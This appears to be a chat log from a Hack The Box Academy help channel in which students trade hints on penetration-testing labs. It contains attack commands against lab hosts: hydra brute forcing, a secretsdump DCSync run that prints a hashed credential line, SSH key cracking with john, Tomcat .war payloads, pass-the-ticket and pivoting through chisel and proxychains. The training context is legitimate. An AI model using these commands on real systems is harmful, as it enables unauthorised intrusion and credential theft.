10.10.125.101       Dev.inlanefreight.local  App.inlanefreight.local
glacial dragon
#

Thanks man🤝

swift steppe
#

fuck im such a noob

#

i dont know php so this Three is kicking my butt

last cloud
#

complete noob here.....
anyone know of ways to practice parrot, ssh, reverse shells, and nmap.
i dont want to look the web to practice, but i feel like i need to practice a bit before moving further. (outside reading man and help.)

compact patrolBOT
hallow kiln
last cloud
#

i have completed several of the beginning courses on a different source before finding HTB. was able to accomplish all tasks, find all the answers to any questions. but when its over i know what i did, but only the exact instance. are there any reccomendations for ways to practice with nmap and ssh. i feel like i need a few more practice examples to get concepts honed.
when you struggle but pass one lesson, and want more practice before moving to next step, are there places or ways you can run the simulations....for example, is it allowed to run countless nmap tests on various public domains? or do certain tests become too aggressive.

torn terrace
#

Totally More Hack the Box!

hallow kiln
sharp crescent
#

Sorry for the late reply but there are a few ways you can do this, you can change the pass file that is being used by metasploit, you can also utilize nmap and do an ipmi-* for the script, which takes a while

undone sundial
#

Hi,

Im working on the password cracking htbacademy module, and have enumerated that there is a share called 'CASSIE'

hydra -l cassie -P password.list 10.129.202.136 smb

I have tried all variants of cassie but it doesn't seem to work, any tips?

tight mesa
#

anyone have an idea what could be happening here, when I ran this command

secretsdump.py -outputfile inlanefreight_hashes -just-dc INLANEFREIGHT/adunn@172.16.5.5

I'm getting this error message at the end of the command execution

inlanefreight.local\yousbaged58:1715:aad3b435b51404eeaad3b435b51404ee:8025d12232e66c0bf0c4dd76baed7f6d:::
[-] [Errno 104] Connection reset by peer
[*] Something wen't wrong with the DRSUAPI approach. Try again with -use-vss parameter
[*] Cleaning up...ls

tight mesa
#

I'm running command by command as is described in the module DCsync from AD Enum & Attack just replicating...

wary tendon
#

what is kiras id-rsa password trying to use mutated wordlist but get

#

john --wordlist=~/Desktop/mut_password.list ~/id_rsa
Using default input encoding: UTF-8
No password hashes loaded (see FAQ)

#

when i go to open id_rsa it asks for password and kiras password doesnt work

sly dome
#

is id_rsa a hash?

wary tendon
#

raceback (most recent call last):
File "/usr/share/john/ssh2john.py", line 193, in <module>
read_private_key(filename)
File "/usr/share/john/ssh2john.py", line 103, in read_private_key
data = base64.decodestring(data)
AttributeError: module 'base64' has no attribute 'decodestring'

sly dome
#

run it with python2

wary tendon
#

how would i run it with python 2

sly dome
#

lol

wary tendon
#

ok i try

#

python 2 not found

sly dome
#

install?

#

jesus christ

hallow kiln
sly dome
#

or just run with py2 lol

hallow kiln
wary tendon
#

john just wont do it

#

ssh.hashes] couldn't parse keyfile

wary tendon
#

john --wordlist=~/Desktop/mut_password.list ~/Desktop/id_rsa1.txt
Using default input encoding: UTF-8
No password hashes loaded (see FAQ)

sly dome
wary tendon
#

bash: ssh1.txt: Permission denied

#

python2 ssh2john ~/Desktop/id_rsa1.txt > ssh1.hash
bash: ssh1.hash: Permission denied

#

nvrmnd i gotit

#

had to run ssh2john from john folder

sly dome
#

sure it was that

tidal mango
#

I have a Question on mimkatz and the AD Skills assesments, last time I did this module (about a year ago) I was able to find cleartext creds with mimikatz at one point on the skills assessments both 1 and 2. This go around those same Fields show (null). I am perplexed as to why it showed cleartext password last time and not this time around. It is probably something simple I am missing or maybe a change... Anyone have an idea for this?

arctic junco
fathom pendant
#

You should be using the mutated list

#

And doing -t 48 to speed it up

#

Also don't brute ssh with hydra

cedar void
fathom pendant
#

Yes

#

From that point on, that's the wordlist for the module

heavy marsh
#

On the shells and payloads live engagement I am confused about the Tomcat portion.

#

Where was that covered in the previous lessons?

fathom pendant
#

You mean the .war?

heavy marsh
#

Yeah, which module covered Tomcat? I'm trying to brush up on that section.

fathom pendant
#

There's none that specifically covers tomcat

heavy marsh
#

I found the answer another way, but I feel like I'm missing something.

#

Hmmm...

fathom pendant
#

It's about research

heavy marsh
#

So hacktricks probably?

fathom pendant
#

When you visit tomcat manager you see it allows you to upload .war files

#

So you craft a payload around it

heavy marsh
#

Yeah, I've used it before a couple months ago on another box, I was just confused because I didn't remember any HTB specific lesson on it thus far.

fathom pendant
#

The closest is the msfvenom section

heavy marsh
#

Yeah, I went back through that, it helped.

fathom pendant
#

That teaches you about the tool

heavy marsh
#

I'm pretty good with msfvenom, have some templates in my notes.

fathom pendant
#

But tbh if they did a tomcat module, they'd have to do nginx, apache and others

heavy marsh
#

That might be worthwhile, but I guess it's easier to just have people supplement with their own research. I'm just still working through trying to figure out what I should know from the HTB curriculum, and what I need to discover on my own.

fathom pendant
#

The live engagement is all about research and crafting payloads based on it

heavy marsh
#

Okay, thank you.

fiery berry
fathom pendant
#

The skill assessments won't always be 1-1 to the section, if they told you about tomcat it wouldn't be much of a skill assessment would it

#

You'd just copy/paste the payload and not figure out why

heavy marsh
#

I'm realizing that with some of the modules.

#

I forgot to switch my VPN to UDP like you mentioned, but it's slightly faster today.

fathom pendant
#

Tcp is better

#

More reliable

heavy marsh
#

You had mentioned yesterday that UDP might be faster, so I was going to try that but forgot.

#

I remember now, the Tomcat material I had was from my TryHackMe notes

fathom pendant
#

When did I say UDP would be faster?

#

I actively advocate for people to use the tcp download

heavy marsh
#

I misread what you said

#

so TCP is faster?

fathom pendant
#

It's more stable

#

Stability > speed

#

Literally 99.9999% of issues people have with the rdp sections is bc udp

heavy marsh
#

Good to know, glad I clarified, thanks!

fathom pendant
#

And I say that bc (even without changing vpn regions) when people download and use the tcp one, they say their issue is resolved with the connection dropping

hallow kiln
#

Is there any situation where UDP would be preferred in the case of a VPN?

#

cause there's always a chance it will cause some connection issues

fathom pendant
#

Probably restrictions in more locked down countries

wary tendon
#

need help with this question . i have gotten into root but cant seem to smb client into dc01/linux01$. this is the question . "Use the LINUX01$ Kerberos ticket to read the flag found in \DC01\linux01. Submit the contents as your response (the flag starts with Us1nG_)." is there something i am missing

fathom pendant
wary tendon
#

ok so where am i going wrong

fathom pendant
#

You need to find the ticket, perhaps using the tool from the section can help you find it

wary tendon
#

linikatz

fathom pendant
#

Are you asking me or telling me

wary tendon
#

im asking

hallow kiln
#

tbh the module tells you exactly where a machine account ticket can usually be found

wary tendon
#

this is all that shows for linux01$

fathom pendant
#

You can't post screenshots

wary tendon
#

srry

fathom pendant
#

Need to verify your main htb account following #welcome

hallow kiln
#

I recommend going back to the section on finding kerberos tickets in Linux

fathom pendant
wary tendon
#

said not to send screenshots

fathom pendant
#

No, I said you can't

#

Literally

#

There's a difference

wary tendon
#

oh ok

#

i still cant figure this out

#

search for tickes

hallow kiln
#

if you want to post screenshots, read and follow #welcome like Marcie said

wary tendon
#

find tickes besides linux01$

hallow kiln
#

the module gives you the exact location

wary tendon
#

julio carlos etc

fathom pendant
#

One of them is the daemon you see in realms info

wary tendon
#

/tmp# ls -al

#

then it shows users and some locations

fathom pendant
#

Nope

#

Not in tmp

hallow kiln
#

seriously, go back to the module

fathom pendant
#

^

#

The tool shows tickets in more than just the /tmp directory

hallow kiln
#

there's no need for a tool even or anything more than knowing the location, which is explicitly pointed out

rustic sage
#

why do i want to die when im doing machinessadglas

fathom pendant
hallow kiln
#

tbh I don't remember what tool we're talking about

fathom pendant
#

Just blind copying is what leads to not knowing what to do

hallow kiln
#

you can find tickets with the find command and extract hashes with the python script, what else was there? 🤔

wary tendon
#

its asking for password

fathom pendant
#

What happens if you just hit enter (no password)

wary tendon
#

Anonymous login successful
tree connect failed: NT_STATUS_BAD_NETWORK_NAME

heavy marsh
#

Where is the 50064.rb in metasploit on the shells and payloads live engagement?

#

I've tried searching by noun name, searching by number, I even tried importing it and metasploit still cant find it.

#

The hint just says to use the "use" function...?

hallow kiln
#

and have you tried using the use function?

heavy marsh
#

I have to first find the module before I use it

#

so no

hallow kiln
#

well you can definitely find it with searchsploit, but or just do what the hint says and type use number.rb

heavy marsh
#

Yeah, I found it with searchsploit, but it's not in metasploit.

hallow kiln
#

again, did you try the use function?

wary tendon
#

still cant log into lin01$

heavy marsh
#

I did not

#

There is no number for me to use

#

I am expecting the one result so that I can "use 0"

fathom pendant
#

And are you sure you're using the right ccache

hallow kiln
fathom pendant
hallow kiln
#

I didn't want to spell it out but there you go

heavy marsh
#

Yeah that worked.

#

Thanks.

#

Why does that not come up in search?

fathom pendant
#

Because the db hadn't been updated

#

I think you can run updatedb and it'd work

heavy marsh
#

I did and it threw a bunch of errors

#

I even followed a walkthrough on how to manually upload the exploit

fathom pendant
#

It's already there:^)

#

You could also, after using searchsploit, do locate 50064.rb

heavy marsh
fathom pendant
#

One of them being the .msf*

heavy marsh
#

I'm still just confused why I can't use the search function for it and "use 0"

#

It's what I've always done with metasploit

fathom pendant
#

This is showing other ways to use Metasploit

heavy marsh
#

So anything from searchsploit is done manually with "use <filename>" and anything searched within metasploit is done with the "use #" option?

fathom pendant
#

Basically

#

You can even do use filename/path even if you can search it in Metasploit

heavy marsh
#

Good to know, thanks!

round gale
#

in the attack common services module, assessment easy, there are 2 ways to get the flag. i got the flag via brute force and then the sqlmap command. whats the second method?

#

any clues

slate creek
#

Hi can you help me with the last stage of the Q3 for this task, I am stufk after finding fiona's creds. can I DM you?

coarse void
slate creek
coarse void
#

john is the correct account to impersonate

#

think deeper or go back to the sql section to look for other ways to enumerate mssql

#

dm me if you still need help

oblique spoke
#

Hi! i got stuck in password attacks Passwd, Shadow & Opasswd part. I basically did the whole thing, got the root hash and when i used hashcat with rockyou.txt the result was some kind of Vamos! thing. What am i missing? thank you

fathom pendant
oblique spoke
#

thank you!

hallow kiln
#

<@&861185840277487616>

novel matrix
#

Hmm

fathom pendant
#

Sirg this isn't Google

hallow kiln
#

it's hilarious that that part wasn't deleted lol

umbral fulcrum
#

Hey Guys, I'm stuck on "Web Attacks - Skills Assessment",
I don't find the way to change the ||PHPSESSID so I can get the admin token|| can someone please give me a nudge

candid lily
#

how can i compile a exploit on my system that works on target system

candid lily
umbral fulcrum
candid lily
#

search for IDOR

umbral fulcrum
# candid lily search for IDOR

I'm trying to get the token, but there's something I missing ...
I can't get the admin token & I can't change the user phpsessid so I'm kinda stuck 😕

fathom pendant
#

Everything you need to know should be in the module

sudden blaze
#

Hello! Having troubles with proxychains because it doesnt resolve hostname: dc01.inlanefreight.htb Command:proxychains3 evil-winrm -i 172.16.1.15 -r inlanefreight.htb
Output:|DNS-response|: dc01.inlanefreight.htb does not exist Any help would be appreciated - thx

#

/etc/hosts: 172.16.1.15 inlanefreight inlanefreight.htb dc01 dc01.inlanefreight.htb

rustic sage
sudden blaze
#

No. Output: server can't find dc01.inlanefreight.htb: NXDOMAIN

#

strange

fathom pendant
#

Because the 172 is an internal ip only reachable through target machine

#

Order is 10.129.x.x is target -> 172.16.x.x internal network on target

#

I assume you have a pivot/proxy on the spawned target

#

If not, that's why

sudden blaze
#

yes i have a reverse chisel tunnel running

#

proxy#R:127.0.0.1:1080=>socks: Listening

fathom pendant
#

You have the chisel server running on your machine yeah?

sudden blaze
#

yes

fathom pendant
#

Also when you did nslookup did you do proxychains nslookup

sudden blaze
#

yes

fathom pendant
#

Weird I dont recall having many issues with this module, just followed step by step

#

Perhaps you're missing an intermediary host

sudden blaze
#

what do you mean by intermediary host

fathom pendant
#

But other than that not sure what elsr

#

A target between the spawned target and the one referenced in the question

sudden blaze
#

@fathom pendant dont really understand what the intermediary host could be? sry

rustic sage
#

hows your proxychains setup?

fathom pendant
rustic sage
#

@sudden blaze can u cat ur proxychains.conf file

fathom pendant
#

But also I'm 99% sure that .15 isn't the dc01

rustic sage
#

and grep for proxy_dns

fathom pendant
rustic sage
fathom pendant
#

And modifying /etc/hosts isn't required

sudden blaze
#

[ProxyList]

add proxy here ...

meanwile

defaults set to "tor"

#socks4 127.0.0.1 9050
socks5 127.0.0.1 1080

fathom pendant
#
Like this
sudden blaze
#
# add proxy here ...
# meanwile
# defaults set to "tor"
#socks4  127.0.0.1 9050
socks5  127.0.0.1 1080
hallow kiln
#

what module is this so I can check my notes?

fathom pendant
#

Pivoting port forwarding module

#

If I'm not mistaken

#

My notes on this module are mostly lacking but thats also because it was 99% just follow the steps

sudden blaze
#

No stuck for days now on Module:Password Attacks Section:pass the ticket from linux optional exercises

fathom pendant
#

It's optional

#

Just skip it

sudden blaze
#

no

#

just wont it to function

fathom pendant
#

You're gonna give yourself more headaches

#

Since most people did just skip the optional exercises

hallow kiln
#

yeah, I did skip that part, so speculation would be all I can provide

fathom pendant
#

They don't/won't have notes on them

rustic sage
#

@sudden blaze can you connect to the host directly without proxychains?

rustic sage
#

so like evil-winrm -i 172.16.1.15 -r inlanefreight.htb

#

ah right

fathom pendant
#

It's an internal network to the lab

#

Evil win-rm is also just a pain in the ass

hallow kiln
#

have you configured all the stuff with kerberos?

rustic sage
#

oh right i see you mentioned chisel

#

uhhh

#

i haven't really touched that before, but does the chisel server allow for dns configs then?

fathom pendant
#

Tbh learn how to use Ligolo for proxies

hallow kiln
#

like the krb5.conf file? @sudden blaze

rustic sage
hallow kiln
#

tbh, yeah, I bet it'd work with ligolo-ng

fathom pendant
#

All the tools mentioned in the pivoting module look like a joke comparatively

hallow kiln
#

pretty much, I did the exercises both as intended and with ligolo as I was learning it at the time, night and day

rustic sage
#

@sudden blaze can you do chisel server --dns?

#

looks like it is supported according to their man page

fathom pendant
#

Doesn't look like it's required? But like I said optional, so speculation at this point

#

You can always return to these questions later after completing the module

hallow kiln
fathom pendant
hallow kiln
#

maybe it's important to specify dc01 instead of the IP

fathom pendant
#

Then dc01

sudden blaze
#

i tried both -i dc01 and -i 172.16.1.5

fathom pendant
#

Order is linux01 -> ms01 -> dc01

hallow kiln
#

yeah, I saw that too, unclear if they can reach both at the same time or have to go through ms01

fathom pendant
#

Also to repeat

#

Is 172.16.1.15 the dc01 ip.

umbral fulcrum
sudden blaze
#

im not sure about that but i assigned it to that ip lilke in the module

hallow kiln
#

then you should check to be sure

fathom pendant
#

^

#

The examples don't even show adding the ip to the hosts file and calling directly dc01 and inlanefreight.htb through proxychains

hallow kiln
#

me: la la la skips optional stuff
optional stuff: appears on exam
I'd find that hilarious

sudden blaze
#

@fathom pendant Oh my 🙂 it is not! ```root@linux01:/home/svc_workstations@inlanefreight.htb# nslookup dc01
Server: 172.16.1.10
Address: 172.16.1.10#53

Name: dc01.inlanefreight.htb
Address: 172.16.1.10

rustic sage
#

oooooo

hallow kiln
#

there you go

fathom pendant
sudden blaze
#

Hey thx

fathom pendant
#

4head move

#

Always double check and verify info

#

Now do nslookup for ms01

#

Which is also referenced

hallow kiln
#

yeah, often the module is giving an example and the exercise changes some parameters

sly dome
fathom pendant
rustic sage
#

@fathom pendant do you know when ur gonna take ur cpts yet?

fathom pendant
#

After I finish the modules

#

Had some life changes that put things on pause

#

And doing anything rdp related on my current setup is like 1 fpm

hallow kiln
#

how much do you have left?

fathom pendant
hallow kiln
#

gotta say Zephyr was pretty useful, not a single RDP session in sight

fathom pendant
#

Was halfway through it

#

Then life said "fuck you"

hallow kiln
#

tbh by how much you've been helping people I always figured you had completed the path

steady bison
#

Hey everyone, I got 2 quick questions that were bugging me a little. 1: Why is there a VPN for the labs? I always connect to it, but it seems like you can access most machines without it. 2: What is blood for a machine?

fathom pendant
hallow kiln
#

hope all is better now

rustic sage
#

vpn is for when you spin up your own VM

fathom pendant
umbral fulcrum
# sly dome where are you at

got the ||token||, trying to change the ||password of the privilege user|| but I get ||Missing parameters|| when I use ||PUT|| and with ||POST|| I get ||Access Denied||

steady bison
fathom pendant
rustic sage
fathom pendant
#

Not academy

steady bison
#

Nope, my own VM

steady bison
hallow kiln
#

if it's a public IP you can reach it, if it's private, you need the VPN

steady bison
#

So it depends on the module?

fathom pendant
hallow kiln
#

yup

steady bison
#

Alright, thanks!

fathom pendant
#
  1. Blood = first to pwn
steady bison
#

Aaaah

#

Thank you guys!

fathom pendant
#

2 bloods, user and root - related to their respective flags

sly dome
#

😉

#

with Burp

#

right click > change request method

umbral fulcrum
sly dome
#

its automagically done

sly dome
#

and POST ones in the body

#

Burp handles that by itself

umbral fulcrum
oblique spoke
#

Hi! i got stuck at password attacks reading DC01 wit davids hash, i tried both method, the one with mimikatz alway gave me an administrator cmd, the Invoke-SMBExec says david doesnt have write privilege on DC01. What am i missing?

oblique spoke
sly dome
#

which section dude

oblique spoke
sly dome
#

not the correct chat @stuck nova

umbral fulcrum
sly dome
#

no

#

they give you the path of the flag

#

for a reason

umbral fulcrum